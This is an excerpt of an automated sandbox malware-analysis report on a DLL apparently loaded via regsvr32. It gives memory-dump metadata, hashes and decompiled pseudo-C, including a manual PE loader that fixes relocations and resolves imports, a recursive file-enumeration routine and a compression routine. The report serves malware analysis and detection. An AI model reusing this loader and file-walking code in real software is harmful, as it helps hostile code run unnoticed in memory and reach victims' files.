                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
                  • String ID:
                  • API String ID: 2855449287-0
                  • Opcode ID: 9c71082fa761bd29d2373c9429704b0bd8b8f761e3a30b2ff640eaa1795f1f5f
                  • Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
                  • Opcode Fuzzy Hash: 9c71082fa761bd29d2373c9429704b0bd8b8f761e3a30b2ff640eaa1795f1f5f
                  • Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10012AEC, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 52%
                  			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                  0x10012afb
                  0x10012b01
                  0x10012b0a
                  0x10012b0d
                  0x10012b10
                  0x00000000
                  0x10012c01
                  0x10012c05
                  0x10012c07
                  0x10012c15
                  0x10012d33
                  0x10012d3c
                  0x10012d3f
                  0x10012d43
                  0x10012d49
                  0x10012d51
                  0x10012d51
                  0x10012d59
                  0x00000000
                  0x10012d64
                  0x10012c1b
                  0x10012c24
                  0x10012c32
                  0x10012c35
                  0x10012c52
                  0x10012c59
                  0x10012c6b
                  0x10012c6b
                  0x10012c72
                  0x10012c82
                  0x10012c9a
                  0x10012c84
                  0x10012c8c
                  0x10012c8c
                  0x10012c9d
                  0x10012ca1
                  0x10012cb1
                  0x10012cd4
                  0x10012ce6
                  0x10012cb3
                  0x10012cc7
                  0x10012cc7
                  0x10012cf0
                  0x10012d0c
                  0x10012cf2
                  0x10012d01
                  0x10012d01
                  0x10012d14
                  0x10012d1d
                  0x10012d1d
                  0x10012d2b
                  0x00000000
                  0x10012c74
                  0x10012c76
                  0x00000000
                  0x10012c76
                  0x10012c72
                  0x00000000
                  0x10012c35
                  0x10012b18
                  0x10012b26
                  0x10012b2b
                  0x10012b36
                  0x10012b39
                  0x10012b3d
                  0x10012b3f
                  0x10012b4f
                  0x10012b58
                  0x10012b61
                  0x10012b69
                  0x10012b72
                  0x10012b7d
                  0x10012b83
                  0x10012b86
                  0x10012b89
                  0x10012b90
                  0x10012b97
                  0x00000000
                  0x00000000
                  0x10012ba2
                  0x10012bb0
                  0x10012bbb
                  0x10012bc5
                  0x10012bdd
                  0x10012bea
                  0x10012bea
                  0x10012bc7
                  0x10012bd2
                  0x10012bd2
                  0x10012bf1
                  0x10012bf1
                  0x10012bf9
                  0x10012bf9
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                  • LoadLibraryA.KERNEL32(?), ref: 10012C65
                  • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                  • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: AddressProc$HandleLibraryLoadModule
                  • String ID:
                  • API String ID: 384173800-0
                  • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                  • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                  • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                  • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000AEB4, Relevance: 3.1, APIs: 2, Instructions: 113fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 78%
                  			E1000AEB4(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				short _v560;
				short _v562;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t27;
				void* _t31;
				int _t36;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr _t56;
				void* _t61;
				char _t62;
				void* _t63;
				void* _t64;
				void* _t65;
				void* _t80;

				_t80 = __fp0;
				_push(0);
				_t51 = __ecx;
				_push(L"\\*");
				_t27 = E100092E5(__ecx);
				_t65 = _t64 + 0xc;
				_v16 = _t27;
				if(_t27 == 0) {
					return _t27;
				}
				_t61 = FindFirstFileW(_t27,  &_v608);
				if(_t61 == 0xffffffff) {
					L18:
					return E1000861A( &_v16, 0xfffffffe);
				}
				_t31 = 0x2e;
				do {
					if(_v608.cFileName != _t31 || _v562 != 0 && (_v562 != _t31 || _v560 != 0)) {
						if((_v608.dwFileAttributes & 0x00000010) != 0) {
							L14:
							_push(0);
							_push( &(_v608.cFileName));
							_push("\\");
							_t62 = E100092E5(_t51);
							_t65 = _t65 + 0x10;
							_v12 = _t62;
							if(_t62 != 0) {
								_t56 =  *0x1001e684; // 0x2c2faa0
								 *((intOrPtr*)(_t56 + 0xb4))(1);
								_push(1);
								_push(1);
								_push(0);
								E1000AEB4(_t62, _t80, 1, 5, E1000EFAA, _a16);
								_t65 = _t65 + 0x1c;
								E1000861A( &_v12, 0xfffffffe);
							}
							goto L16;
						}
						_t63 = 0;
						do {
							_t10 = _t63 + 0x1001e78c; // 0x0
							_push( *_t10);
							_push( &(_v608.cFileName));
							_t44 =  *0x1001e690; // 0x2c2fd40
							if( *((intOrPtr*)(_t44 + 0x18))() == 0) {
								goto L12;
							}
							_t48 = E1000EFAA(_t80, _t51,  &_v608, _a16);
							_t65 = _t65 + 0xc;
							if(_t48 == 0) {
								break;
							}
							_t49 =  *0x1001e684; // 0x2c2faa0
							 *((intOrPtr*)(_t49 + 0xb4))(1);
							L12:
							_t63 = _t63 + 4;
						} while (_t63 < 4);
						if((_v608.dwFileAttributes & 0x00000010) == 0) {
							goto L16;
						}
						goto L14;
					}
					L16:
					_t36 = FindNextFileW(_t61,  &_v608);
					_t31 = 0x2e;
				} while (_t36 != 0);
				_t37 =  *0x1001e684; // 0x2c2faa0
				 *((intOrPtr*)(_t37 + 0x78))(_t61);
				goto L18;
			}























                  0x1000aeb4
                  0x1000aec0
                  0x1000aec2
                  0x1000aec4
                  0x1000aeca
                  0x1000aecf
                  0x1000aed2
                  0x1000aed7
                  0x1000b011
                  0x1000b011
                  0x1000aeeb
                  0x1000aef0
                  0x1000b000
                  0x00000000
                  0x1000b00c
                  0x1000aef8
                  0x1000aef9
                  0x1000af00
                  0x1000af2f
                  0x1000af82
                  0x1000af82
                  0x1000af8a
                  0x1000af8b
                  0x1000af96
                  0x1000af98
                  0x1000af9b
                  0x1000afa0
                  0x1000afa2
                  0x1000afaa
                  0x1000afb0
                  0x1000afb2
                  0x1000afb4
                  0x1000afc9
                  0x1000afce
                  0x1000afd7
                  0x1000afdd
                  0x00000000
                  0x1000afa0
                  0x1000af31
                  0x1000af33
                  0x1000af33
                  0x1000af33
                  0x1000af3f
                  0x1000af40
                  0x1000af4a
                  0x00000000
                  0x00000000
                  0x1000af57
                  0x1000af5c
                  0x1000af61
                  0x00000000
                  0x00000000
                  0x1000af63
                  0x1000af6a
                  0x1000af70
                  0x1000af70
                  0x1000af73
                  0x1000af80
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000af80
                  0x1000afde
                  0x1000afe6
                  0x1000aff0
                  0x1000aff0
                  0x1000aff7
                  0x1000affd
                  0x00000000

                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 1000AEE5
                  • FindNextFileW.KERNEL32(00000000,?), ref: 1000AFE6
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: FileFind$FirstNext
                  • String ID:
                  • API String ID: 1690352074-0
                  • Opcode ID: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                  • Instruction ID: 241d9436e866cb8d74d7214ef8056216292051dc3c91cda8f0119f884e331b15
                  • Opcode Fuzzy Hash: f9e1cb566febe833079e4b3b72957263e334003dd3a33dd3f6c3ab431763b655
                  • Instruction Fuzzy Hash: 8E31A47190021A6EFB10DBE4CC89FAA33B9EB047D0F110165F509AA1D5E771EEC4CB65
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10029660, Relevance: 3.1, APIs: 2, Instructions: 84memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000744), ref: 1002966B
                  • RtlAllocateHeap.NTDLL(00000000), ref: 10029672
                  Memory Dump Source
                  • Source File: 00000005.00000002.497767833.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10021000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID:
                  • API String ID: 1357844191-0
                  • Opcode ID: f0b32d386485ec8b2252e74fa392f6863baef6b9d97772d80ece6e57939d808c
                  • Instruction ID: f2d45d7e56076847abda7dacf9d916d46c2c24713d6d1dcbf256efb98a2a20cf
                  • Opcode Fuzzy Hash: f0b32d386485ec8b2252e74fa392f6863baef6b9d97772d80ece6e57939d808c
                  • Instruction Fuzzy Hash: C8318175A002A08BE7388F39CDEC5A97BF1FBC4316715436AD485A72A5D2BA5881CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000980C, Relevance: 3.0, APIs: 2, Instructions: 24timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTimeAsFileTime.KERNEL32(?,?,10005FAF), ref: 10009819
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10009839
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1518329722-0
                  • Opcode ID: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                  • Instruction ID: efe317659bb93fd964c7109caf3faa3499ed084e9357a5ece8a85f8370063b94
                  • Opcode Fuzzy Hash: e28efd3bc395d1b39df08d097cd77ac4fd9f2a4dd6740d30e2db242414d57b87
                  • Instruction Fuzzy Hash: BDE0DF7A8003186FD750EF788D46F9ABBFDEB80A00F018554AC85B3308E670EF048790
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000A51A, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E1000A51A(struct HINSTANCE__* __ecx, CHAR* __edx, void* __fp0, intOrPtr* _a4) {
				CHAR* _v8;
				struct HRSRC__* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t15;
				signed int _t17;
				struct HRSRC__* _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr* _t23;
				intOrPtr* _t26;
				struct HINSTANCE__* _t28;
				intOrPtr _t30;
				intOrPtr* _t33;
				signed int _t35;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t43 = __fp0;
				_t29 = __ecx;
				_v8 = __edx;
				_t28 = __ecx;
				_v20 = 0xa;
				_t35 = 0;
				_v16 = 3;
				while(1) {
					_t15 =  *0x1001e688; // 0x2bb0590
					_t17 = E1001242D(_t29, 0, _t43, _t15 + 0x648, 0x1e, 0x32);
					_t29 =  *0x1001e688; // 0x2bb0590
					_t39 = _t39 + 0xc;
					_t4 = _t29 + 0x644; // 0x0
					_t20 = FindResourceA(_t28, _v8, _t17 *  *_t4 +  *((intOrPtr*)(_t38 + _t35 * 4 - 0x10)));
					_v12 = _t20;
					if(_t20 != 0) {
						break;
					}
					_t35 = _t35 + 1;
					if(_t35 < 2) {
						continue;
					}
					L5:
					return 0;
				}
				_t21 =  *0x1001e684; // 0x2c2faa0
				_t22 =  *((intOrPtr*)(_t21 + 0x98))(_t28, _t20);
				_t30 =  *0x1001e684; // 0x2c2faa0
				_t37 = _t22;
				_t23 =  *((intOrPtr*)(_t30 + 0x9c))(_t28, _v12);
				__eflags = _t23;
				if(_t23 != 0) {
					_t33 = E10008669(_t23, _t37);
					__eflags = _t33;
					if(_t33 == 0) {
						goto L5;
					}
					_t26 = _a4;
					__eflags = _t26;
					if(_t26 != 0) {
						 *_t26 = _t37;
					}
					return _t33;
				}
				goto L5;
			}






















                  0x1000a51a
                  0x1000a51a
                  0x1000a523
                  0x1000a526
                  0x1000a528
                  0x1000a52f
                  0x1000a531
                  0x1000a538
                  0x1000a538
                  0x1000a54d
                  0x1000a552
                  0x1000a558
                  0x1000a55b
                  0x1000a56b
                  0x1000a571
                  0x1000a576
                  0x00000000
                  0x00000000
                  0x1000a578
                  0x1000a57c
                  0x00000000
                  0x00000000
                  0x1000a5a3
                  0x00000000
                  0x1000a5a3
                  0x1000a581
                  0x1000a587
                  0x1000a590
                  0x1000a596
                  0x1000a599
                  0x1000a59f
                  0x1000a5a1
                  0x1000a5b0
                  0x1000a5b2
                  0x1000a5b4
                  0x00000000
                  0x00000000
                  0x1000a5b6
                  0x1000a5b9
                  0x1000a5bb
                  0x1000a5bd
                  0x1000a5bd
                  0x00000000
                  0x1000a5bf
                  0x00000000

                  APIs
                    • Part of subcall function 1001242D: _ftol2_sse.MSVCRT ref: 1001248E
                  • FindResourceA.KERNEL32(10000000,?,0000000A), ref: 1000A56B
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: FindResource_ftol2_sse
                  • String ID:
                  • API String ID: 726351646-0
                  • Opcode ID: fa11afd7f41ea2378334fb299b75509f8c3df56b18904dd99f39985f38db9f94
                  • Instruction ID: 3c93fbf5725d9a1cffb7147d36ac05838d176544f789f1d2bd1208ee8d1f8f1b
                  • Opcode Fuzzy Hash: fa11afd7f41ea2378334fb299b75509f8c3df56b18904dd99f39985f38db9f94
                  • Instruction Fuzzy Hash: 3D119D71B00305AFFB04CB69EC85E5E7BE9FB55395F014168F909D7252EA71DD408B50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10016EB0, Relevance: .4, Instructions: 359COMMONCrypto
                  Download Yara Rule
                  C-Code - Quality: 99%
                  			E10016EB0(intOrPtr _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed short* _v12;
				char _v16;
				signed short _v20;
				unsigned int _v24;
				signed short _v28;
				signed int _t223;
				signed int _t235;
				signed int _t237;
				signed short _t240;
				signed int _t241;
				signed short _t244;
				signed int _t245;
				signed short _t248;
				signed int _t249;
				signed int _t250;
				void* _t254;
				signed char _t259;
				signed int _t275;
				signed int _t289;
				signed int _t308;
				signed short _t316;
				signed int _t321;
				void* _t329;
				signed short _t330;
				signed short _t333;
				signed short _t334;
				signed short _t343;
				signed short _t346;
				signed short _t347;
				signed short _t348;
				signed short _t358;
				signed short _t361;
				signed short _t362;
				signed short _t363;
				signed short _t370;
				signed int _t373;
				signed int _t378;
				signed short _t379;
				signed short _t382;
				unsigned int _t388;
				unsigned short _t390;
				unsigned short _t392;
				unsigned short _t394;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t400;
				signed short _t401;
				signed int _t402;
				signed int _t403;
				signed int _t407;
				signed int _t409;

				_t223 = _a8;
				_t235 =  *(_t223 + 2) & 0x0000ffff;
				_push(_t397);
				_t388 = 0;
				_t398 = _t397 | 0xffffffff;
				if(_a12 < 0) {
					L42:
					return _t223;
				} else {
					_t329 =  !=  ? 7 : 0x8a;
					_v12 = _t223 + 6;
					_t254 = (0 | _t235 != 0x00000000) + 3;
					_v16 = _a12 + 1;
					do {
						_v24 = _t388;
						_t388 = _t388 + 1;
						_a8 = _t235;
						_a12 = _t235;
						_v8 =  *_v12 & 0x0000ffff;
						_t223 = _a4;
						if(_t388 >= _t329) {
							L4:
							if(_t388 >= _t254) {
								if(_a8 == 0) {
									_t122 = _t223 + 0x16bc; // 0x8b3c7e89
									_t400 =  *_t122;
									if(_t388 > 0xa) {
										_t168 = _t223 + 0xac4; // 0x5dc03300
										_t330 =  *_t168 & 0x0000ffff;
										_t169 = _t223 + 0xac6; // 0x55c35dc0
										_t237 =  *_t169 & 0x0000ffff;
										_v24 = _t330;
										_t171 = _t223 + 0x16b8; // 0xfffffe8b
										_t333 = (_t330 << _t400 |  *_t171) & 0x0000ffff;
										_v28 = _t333;
										if(_t400 <= 0x10 - _t237) {
											_t259 = _t400 + _t237;
										} else {
											_t173 = _t223 + 0x14; // 0xc703f045
											 *(_t223 + 0x16b8) = _t333;
											_t175 = _t223 + 8; // 0x8d000040
											 *((char*)( *_t175 +  *_t173)) = _v28;
											_t223 = _a4;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t181 = _t223 + 0x14; // 0xc703f045
											_t182 = _t223 + 8; // 0x8d000040
											_t183 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t181 +  *_t182)) =  *_t183;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t333 = _v24 >> 0x10;
											_t189 = _t223 + 0x16bc; // 0x8b3c7e89
											_t259 =  *_t189 + 0xfffffff0 + _t237;
										}
										_t334 = _t333 & 0x0000ffff;
										 *(_t223 + 0x16bc) = _t259;
										 *(_t223 + 0x16b8) = _t334;
										_t401 = _t334 & 0x0000ffff;
										if(_t259 <= 9) {
											_t209 = _t388 - 0xb; // -10
											 *(_t223 + 0x16b8) = _t209 << _t259 | _t401;
											 *(_t223 + 0x16bc) = _t259 + 7;
										} else {
											_t193 = _t223 + 8; // 0x8d000040
											_t390 = _t388 + 0xfffffff5;
											_t194 = _t223 + 0x14; // 0xc703f045
											_t240 = _t390 << _t259 | _t401;
											 *(_t223 + 0x16b8) = _t240;
											 *( *_t193 +  *_t194) = _t240;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											_t199 = _t223 + 0x14; // 0xc703f045
											_t200 = _t223 + 8; // 0x8d000040
											_t201 = _t223 + 0x16b9; // 0x89fffffe
											 *((char*)( *_t199 +  *_t200)) =  *_t201;
											 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
											 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff7;
											 *(_t223 + 0x16b8) = _t390 >> 0x10;
										}
										goto L35;
									}
									_t123 = _t223 + 0xac0; // 0x4e9
									_t343 =  *_t123 & 0x0000ffff;
									_t124 = _t223 + 0xac2; // 0x33000000
									_t241 =  *_t124 & 0x0000ffff;
									_v24 = _t343;
									_t126 = _t223 + 0x16b8; // 0xfffffe8b
									_t346 = (_t343 << _t400 |  *_t126) & 0x0000ffff;
									_v28 = _t346;
									if(_t400 > 0x10 - _t241) {
										_t128 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t346;
										_t130 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t130 +  *_t128)) = _v28;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t136 = _t223 + 0x14; // 0xc703f045
										_t137 = _t223 + 8; // 0x8d000040
										_t138 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t136 +  *_t137)) =  *_t138;
										_t142 = _t223 + 0x16bc; // 0x8b3c7e89
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t346 = _v24 >> 0x10;
										_t400 =  *_t142 + 0xfffffff0;
									}
									_t403 = _t400 + _t241;
									_t347 = _t346 & 0x0000ffff;
									 *(_t223 + 0x16bc) = _t403;
									 *(_t223 + 0x16b8) = _t347;
									_t348 = _t347 & 0x0000ffff;
									if(_t403 <= 0xd) {
										_t163 = _t403 + 3; // 0x8b3c7e8c
										_t275 = _t163;
										L28:
										 *(_t223 + 0x16bc) = _t275;
										_t165 = _t388 - 3; // -2
										_t166 = _t223 + 0x16b8; // 0xfffffe8b
										 *(_t223 + 0x16b8) = (_t165 << _t403 |  *_t166 & 0x0000ffff) & 0x0000ffff;
									} else {
										_t392 = _t388 + 0xfffffffd;
										_t147 = _t223 + 0x14; // 0xc703f045
										_t244 = _t392 << _t403 | _t348;
										_t148 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t244;
										 *( *_t148 +  *_t147) = _t244;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t153 = _t223 + 0x14; // 0xc703f045
										_t154 = _t223 + 8; // 0x8d000040
										_t155 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t153 +  *_t154)) =  *_t155;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff3;
										 *(_t223 + 0x16b8) = _t392 >> 0x00000010 & 0x0000ffff;
									}
									goto L35;
								}
								_t289 = _a12;
								if(_t289 != _t398) {
									_t53 = _t289 * 4; // 0x238830a
									_t396 =  *(_t223 + _t53 + 0xa7e) & 0x0000ffff;
									_t56 = _t235 * 4; // 0x830a74c0
									_t370 =  *(_t223 + _t56 + 0xa7c) & 0x0000ffff;
									_t58 = _t223 + 0x16bc; // 0x8b3c7e89
									_t407 =  *_t58;
									_v28 = _t370;
									_t60 = _t223 + 0x16b8; // 0xfffffe8b
									_t249 = (_t370 << _t407 |  *_t60) & 0x0000ffff;
									if(_t407 <= 0x10 - _t396) {
										_t373 = _t249;
										_t308 = _t407 + _t396;
									} else {
										_t61 = _t223 + 0x14; // 0xc703f045
										_t62 = _t223 + 8; // 0x8d000040
										 *(_t223 + 0x16b8) = _t249;
										 *( *_t62 +  *_t61) = _t249;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x5d0674c0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x4e95d06
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xfffffe8b
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
